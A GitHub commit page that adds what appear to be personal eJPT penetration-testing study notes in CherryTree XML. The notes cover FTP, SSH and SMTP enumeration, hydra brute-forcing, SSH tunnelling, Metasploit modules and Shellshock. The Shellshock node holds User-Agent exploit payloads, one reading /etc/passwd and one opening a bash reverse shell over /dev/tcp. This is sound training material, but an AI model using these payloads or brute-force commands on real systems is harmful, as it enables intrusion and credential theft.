Skip to content

Commit 4ce2c97

Browse files
y3t1secy3t1sec
authored
Add files via upload
1 parent 3251857 commit 4ce2c97

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

42 files changed

+1561
-0
lines changed

EJPT/EJPT/1/2/10/node.xml

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="ftp checklist" unique_id="10" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704138836" ts_lastsave="1704138900">
4+
<rich_text>Is Anonymous Login Permitted?
5+
Were weak or default credentials being used?
6+
Are there known vulnerabilities with the server version?</rich_text>
7+
</node>
8+
</cherrytree>

EJPT/EJPT/1/2/node.xml

Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="21 - FTP" unique_id="2" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704059877" ts_lastsave="1704149195">
4+
<rich_text>
5+
check if anon login allowed:
6+
7+
8+
bruteforce default logins:
9+
10+
11+
Active/Passive
12+
if you receive an error about being unable to download files due to passive mode being in place simply type
13+
14+
15+
Connecting to FTP
16+
17+
18+
Download all FTP files
19+
20+
21+
**Metasploit**
22+
23+
24+
Check searchsploit and google to see if version of FTP has known vulns
25+
26+
More Information:
27+
28+
</rich_text>
29+
<rich_text link="webs https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp">https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp</rich_text>
30+
<rich_text>
31+
</rich_text>
32+
<rich_text link="webs https://github.com/neilmadhava/EJPTv2-Notes/blob/main/Information%20Gathering%20and%20Enumeration/FTP.md">https://github.com/neilmadhava/EJPTv2-Notes/blob/main/Information%20Gathering%20and%20Enumeration/FTP.md</rich_text>
33+
<rich_text>
34+
35+
36+
37+
38+
39+
40+
</rich_text>
41+
<codebox char_offset="30" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap -p 21 &lt;ip.addr&gt; --script=ftp-anon</codebox>
42+
<codebox char_offset="62" justification="left" frame_width="617" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap -p 21 &lt;ip.addr&gt; ftp-brute --script-args userdb=/root/users
43+
hydra -L user.txt -P pass.txt -V -f ip.addr ftp #hydra is better and faster</codebox>
44+
<codebox char_offset="191" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">ftp&gt; passive</codebox>
45+
<codebox char_offset="214" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">ftp ip.addr
46+
ftp [email protected]</codebox>
47+
<codebox char_offset="242" justification="left" frame_width="593" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">wget -m ftp://anonymous:[email protected] #Donwload all
48+
wget -m --no-passive ftp://anonymous:[email protected] #Download all</codebox>
49+
<codebox char_offset="260" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">search type:auxiliary name:ftp
50+
auxiliary/scanner/ftp/ftp_login</codebox>
51+
</node>
52+
</cherrytree>

EJPT/EJPT/1/2/subnodes.lst

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
10

EJPT/EJPT/1/3/11/node.xml

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="ssh checklist" unique_id="11" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704138923" ts_lastsave="1704138970">
4+
<rich_text>What version of SSH are you using?
5+
Could you find public / private key information?
6+
Could you enumerate any users?
7+
Are weak / default credentials being used?</rich_text>
8+
</node>
9+
</cherrytree>

EJPT/EJPT/1/3/node.xml

Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="22 - SSH" unique_id="3" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704060859" ts_lastsave="1704140664">
4+
<rich_text>Note: SSH is a pretty secure service, and is pretty hard to configure poorly. It is unlikely that this will be the initial foothold (unless you bruteforce)
5+
6+
</rich_text>
7+
<rich_text underline="single" weight="heavy">Banner Grabbing</rich_text>
8+
<rich_text>
9+
</rich_text>
10+
<rich_text justification="left"></rich_text>
11+
<rich_text>
12+
13+
</rich_text>
14+
<rich_text underline="single" weight="heavy">nmap scripts</rich_text>
15+
<rich_text>
16+
</rich_text>
17+
<rich_text justification="left"></rich_text>
18+
<rich_text>
19+
a list of known bad keys: </rich_text>
20+
<rich_text link="webs https://github.com/rapid7/ssh-badkeys/tree/master/authorized">https://github.com/rapid7/ssh-badkeys/tree/master/authorized</rich_text>
21+
<rich_text>
22+
23+
</rich_text>
24+
<rich_text underline="single" weight="heavy">Bruteforcing SSH</rich_text>
25+
<rich_text>
26+
27+
28+
</rich_text>
29+
<rich_text underline="single" weight="heavy">MetaSploit Modules</rich_text>
30+
<rich_text>
31+
32+
33+
</rich_text>
34+
<rich_text underline="single" weight="heavy">SSH Tunneling</rich_text>
35+
<rich_text>
36+
If you have compromised the host via SSH, you can use this for tunneling. This is much more stable in my experience than using metasploit
37+
38+
39+
</rich_text>
40+
<rich_text underline="single" weight="heavy">SSH Authorized_Keys</rich_text>
41+
<rich_text>
42+
When a device has been compromised, check the user's home folders for authorized keys. This can allow you to privesc without needing a password
43+
44+
45+
</rich_text>
46+
<codebox char_offset="173" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nc -vn ip.addr 22</codebox>
47+
<codebox char_offset="190" justification="left" frame_width="1257" frame_height="70" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap -p 22 ip.addr --script=ssh2-enum-algos #enumerate algorithms used to create key
48+
nmap -p 22 ip.addr --script=ssh-hostkey --script-args ssh_hostkey=full # Shows the target SSH server's key fingerprint
49+
nmap -p 22 ip.addr --script=ssh-auth-methods --script-args="ssh.user=username" #can help you identify accounts without creds</codebox>
50+
<codebox char_offset="297" justification="left" frame_width="857" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -L user.txt -P pass.txt ip.addr -V -f ssh #can help you find low hanging fruit</codebox>
51+
<codebox char_offset="319" justification="left" frame_width="597" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">auxiliary/scanner/ssh/ssh_version
52+
auxiliary/scanner/ssh/ssh_login
53+
scanner/ssh/ssh_enumusers #a timing attack may be possible</codebox>
54+
<codebox char_offset="474" justification="left" frame_width="787" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">sudo ssh -L &lt;local_port&gt;:&lt;remote_host&gt;:&lt;remote_port&gt; -N -f &lt;username&gt;@ip.addr</codebox>
55+
<codebox char_offset="641" justification="left" frame_width="500" frame_height="70" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">cat /home/user/.ssh/authorized_keys
56+
#from attack box
57+
ssh -i authorized_keys [email protected]</codebox>
58+
</node>
59+
</cherrytree>

EJPT/EJPT/1/3/subnodes.lst

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
11

EJPT/EJPT/1/30/node.xml

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="25 - SMTP" unique_id="30" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704149231" ts_lastsave="1704149296">
4+
<rich_text>**MetaSploit**
5+
</rich_text>
6+
<codebox char_offset="15" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">auxiliary/scanner/smtp/smtp_version</codebox>
7+
</node>
8+
</cherrytree>

EJPT/EJPT/1/31/node.xml

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="AutoPwn" unique_id="31" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704149863" ts_lastsave="1704149956">
4+
<rich_text link="webs https://github.com/hahwul/metasploit-autopwn">https://github.com/hahwul/metasploit-autopwn</rich_text>
5+
<rich_text>
6+
7+
</rich_text>
8+
<codebox char_offset="46" justification="left" frame_width="500" frame_height="85" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">load db_autopwn
9+
db_autopwn -h
10+
#example
11+
db_autopwn -p -R great -e -q ip.addr
12+
</codebox>
13+
</node>
14+
</cherrytree>

EJPT/EJPT/1/5/12/node.xml

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="web checklist" unique_id="12" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704139410" ts_lastsave="1704139501">
4+
<rich_text>Did you enumerate other folders?
5+
Did you scan the web server versions and technologies?
6+
Did you view the source of every webpage?
7+
Did you spider the webpages?
8+
Did you Scan the web pages for known vulnerabilities (ZAP)?</rich_text>
9+
</node>
10+
</cherrytree>

EJPT/EJPT/1/5/16/node.xml

Lines changed: 40 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<cherrytree>
3+
<node name="shellshock" unique_id="16" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704141312" ts_lastsave="1704141578">
4+
<rich_text underline="single" weight="heavy">CVE-2014-6271</rich_text>
5+
<rich_text>
6+
7+
One of the biggest Linux vulns over the last 15-20 years. Allows attacker to execute arbitrary commands via RCE.
8+
9+
Actually a family of vulns in the bash shell that allow an attacker to execute remote code. Not very common, and you will likely not encounter it in the wild.
10+
11+
Bash mistakenly executes trailing commands after a series of characters () { :; };
12+
13+
Impacts CGI scripts or .sh scripts that are also vulnerable to this attack. CGI scripts are used by apache to execute arbitary commands on the linux system after which the output is displayed to the client.
14+
15+
In order to exploit this vuln you need to locate an input vector or script that allows you to communicate. In the context of an apache web server we can utilize any legitimate CGI script accessible on the web server. When the script is executed the web server will initiate a new process and run the CGI script with bash. Can be exploited with an MSF module.
16+
17+
To scan for this vuln you can use
18+
</rich_text>
19+
<rich_text justification="left"></rich_text>
20+
<rich_text>
21+
22+
23+
Now any input after () { :; }; will be interpreted by the server.
24+
25+
example of manual exploitation:
26+
</rich_text>
27+
<rich_text justification="left"></rich_text>
28+
<rich_text>
29+
30+
With Metasploit:
31+
</rich_text>
32+
<rich_text justification="left"></rich_text>
33+
<rich_text>
34+
</rich_text>
35+
<codebox char_offset="975" justification="left" frame_width="968" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap ip.addr -sV -p 80 --script=http-shellshock --script-args="http-shellshock.uri=/script.cgi"
36+
auxiliary/scanner/http/apache_mod_cgi_bash_env #metasploit</codebox>
37+
<codebox char_offset="1078" justification="left" frame_width="1488" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">User-Agent: ()P{:;}; echo; echo; /bin/bash -c 'cat /etc/passwd' User-Agent: ()P{:;}; echo; echo; /bin/bash -c 'bash -i&gt;&amp;/dev/tcp/ip.addr/port 0&gt;&amp;1'</codebox>
38+
<codebox char_offset="1098" justification="left" frame_width="748" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">exploit/multi/http/apache_mod_cgi_bash_env_exec #set RHOSTS and TARGETURI</codebox>
39+
</node>
40+
</cherrytree>

0 commit comments

Comments
 (0)